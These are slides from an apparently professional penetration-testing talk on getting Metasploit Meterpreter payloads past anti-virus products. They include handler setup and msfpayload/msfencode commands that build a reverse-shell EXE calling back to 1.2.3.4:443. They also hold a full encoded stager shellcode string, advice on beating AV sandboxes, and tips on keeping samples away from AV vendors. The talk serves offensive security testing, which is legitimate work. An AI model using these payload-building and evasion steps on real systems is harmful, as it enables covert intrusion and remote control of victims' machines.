2. Anti-Virus Got Better
Last January I gave a talk on AV evasion.
I showed how to craft a custom Meterpreter
payload.
Some AV products catch that now!
This presentation shows how to get back in
business.
3. Anti-Virus Got Better
A lot of built-in exploits don't work anymore
because of AV.
You now have to re-write exploits yourself.
Example: unprotected Tomcat installations can
be taken over with the tomcat_mgr_deploy
module.
Without AV, you normally get SYSTEM or root.
With AV, you get disappointment.
4. Goals
Aside from bypassing AV for software exploits,
pentesters need a way to conduct social
engineering.
Ideally, we would like a reliable way to generate
EXE files that run Meterpreter when the user is
tricked.
You can write your own custom code, but then
how do you safely and reliably steal hashes,
hijack tokens, etc?
5. Payload Overview
Usually, the EXE doesn't contain Meterpreter
itself.
Its a stager, whose only job is to connect back
to your Metasploit server and execute what it
returns.
For the last two years, pretty much all the
Metasploit stagers get caught, no matter how
much you encode them.
6. Payload Server
The server is set up with:
msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set PAYLOAD
windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
7. IDS/IPS Evasion
An interesting trick to confuse network IDS/IPS
is to encode the payload as it travels over the
network.
One way is to set StageEncoder on the server.
You can use shikata_ga_nai, etc.
Last I checked, this is very slow!
Another way is to use the
windows/meterpreter/reverse_tcp_rc4 payload.
You set the RC4 key to encrypt communications.
8. Simple Payloads
The most basic way to create an EXE is like
this:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4
LPORT=443 X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"1.2.3.4", "LPORT"=>"443"}
$ ls -l payload.exe
-rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe
$ file payload.exe
payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
9. Simple Payloads
Up until August 2011, you could bypass AV by
encoding like so:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 R |
msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
10. Simple Payloads
Last year I talked about shellcodeexec.
https://github.com/inquisb/shellcodeexec
The punchline is that it takes alphanumericencoded shellcode, stuffs it into memory, and
executes it:
C:Documents and Settingsroot>sce.exe PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkP
RvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWq
ZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc
1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT
45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV
9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIo
jumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p
11. Formerly Good Payload
Here's how the alphanumeric shellcode is
created:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread
LPORT=4444 LHOST=1.2.3.4 R | msfencode -a x86 -e x86/alpha_mixed
-t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsP
nizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJa
xOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1
yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNk
f8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJ
nkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPh
q9K0BK30iozuF0f0pPf03pbpSpf03XIz4OYOYpIoKeLWPj7uE85Q7rWswtphvbWpdQ
slNi8fCZB0cfPWrHoiOURTcQKOXUK5YP0tflIorn5XrUZLCXzPMeORsfIoN5qz30qz
s4cf67ax32JyyXsoIoYELKWFSZQP0huPb0UPWpcfbJePe8BxOTbs8eIoiEmCbs3Zc0
Bv3crwbHER9I8HqOkOZuva8CtiJfLEKFrUjLXCAA
13. Better Payloads
There is a tool called pyinjector which reimplements the essentials of shellcodeexec in
Python.
Creates a writeable and executable memory buffer,
stuffs code into it, executes it.
You use pyinstaller (http://www.pyinstaller.org/)
to create an EXE.
Available at:
https://www.trustedsec.com/files/pyinjector.zip
14. Better Payloads
There is a tool called Hyperion which encrypts
an EXE with AES-128.
The output EXE brute-forces part of the key on
startup.
http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip
This prevents AV from extracting the key and
decrypting the binary.
The stub code for decryption is static!
It is open source though...
15. Best Payloads
The Veil project is a toolkit for creating
payloads that evade AV.
https://www.veil-evasion.com/
It is a relatively new project, but is actively
maintained and developed.
Currently has 22 payloads.
17. Best Payloads
Veil and others seem very useful, but being
open source is a bit of a weakness when it
comes to AV evasion.
This is the same problem that Metasploit has.
Nothing beats writing something yourself!
Best method is to take what's out there,
customize it, and keep it private.
18. Best Payloads
A blog post on the Veil homepage pointed to
information on how to make your own
Meterpreter stager.
With shellcodeexec, the idea was to launch the
generated stager to connect to the server,
download Meterpreter, and execute it.
shellcodeexec → alphanumeric-encoded stager → Meterpreter
Why not write your own stager from scratch?
19. Best Payloads
Someone showed how to write your own
windows/meterpreter/reverse_tcp equivalent.
https://github.com/rsmudge/metasploit-loader
Basically, you open a TCP connection to the
Metasploit server, throw the bytes returned into
an executable buffer.
Prepend the buffer with a ”mov edi, socket_id”
instruction, and jump to it.
Meterpreter will then use the existing TCP session.
20. Best Payloads
How do you customize it?
One of the Metasploit developers mentioned
that AV puts new binaries into a sandbox for
the first N seconds.
Do innocent things like read the registry, read
some config files, compute digits of pi, etc.
Don't sleep to run down the clock!
21. VirusTotal
VirusTotal (http://www.virustotal.com/) lets you
upload binaries to be scanned by 46 AV
products.
Its common knowledge that they pass on
samples to AV vendors.
They know malware authors use it.
Your target can pull down a signature in as little
as one hour.
22. VirusTotal
vt-notify (https://github.com/mubix/vt-notify)
uses the VirusTotal's API to check the SHA-1
hash of your payload.
If you don't get your own API key, it uses a
built-in one.
Its been incorporated into Veil.
This probably tips them off that its malware!
Actually... this functionality as a whole was
probably designed as a trap!
23. Building an AV Lab
The best way to check your payload is by
building your own AV lab.
VirusTotal has 46 products, but how many
corporate environments use ”Kingsoft AV”?
Symantec and McAfee seem to have the
overwhelming market share.
Maybe throw in Kaspersky for good measure too...
24. Building an AV Lab
MSDN Operating Systems subscription is $700
for 1 year.
Symantec Small Business Edition costs $60 for
a 3 year subscription for 1 endpoint.
McAfee SaaS Endpoint Protection costs $52.
Make sure the AV products don't phone home!
25. Building an AV Lab
I'm now actively building this lab.
Once its set up, I'm going to evaluate all these
evasion tools.
If anyone wants to test some payloads, just let
me know!
26. Conclusion
To be a good pentester, you need to know how
to bypass AV.
Many built-in Metasploit modules no longer
work. You have to re-write some or find
alternatives.
The success of your engagement can entirely
depend upon how well you can adapt.
Being a programmer is extremely valuable!